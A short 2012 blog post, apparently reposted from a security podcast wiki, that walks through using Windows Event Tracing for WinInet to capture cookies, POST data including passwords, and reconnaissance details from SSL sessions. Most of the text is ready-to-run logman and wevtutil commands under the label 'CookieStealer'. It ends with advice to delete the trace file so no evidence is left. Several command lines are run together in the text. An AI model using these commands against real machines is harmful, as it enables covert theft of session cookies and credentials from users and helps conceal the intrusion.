Monday, September 17, 2012

Data Mining Event Tracing for Windows

>>>> From http://pauldotcom.com/wiki/index.php/Episode300

This is to show how to tap into the data logged by Windows Communication Foundation (WCF) and fed to Event Tracing for Windows (ETW).

The ETW Provider logs excesive amounts of information that may give an attacker access to sensitive data. By tapping into these otherwise silent logging mechnisms an attacker can find all kinds of useful information.

Below is an example to show "Sidejacking SSL Cookies". You can steal the cookies within the encrypted SSL session.

First, turn on the Event Tracing for WinInet.

c:\>cd \tempc:\temp>logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets


From now on, all the WinInet connections and SSL sessions are logged.

To check the cookies:
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

To check the POST info (including password):
c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

To check some additional reconnaissance:

c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"c:\temp>wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

To turn off your Event logging:

c:\temp>logman stop CookieStealer -ets

And remember to remove your "cookiesteal.etl" file.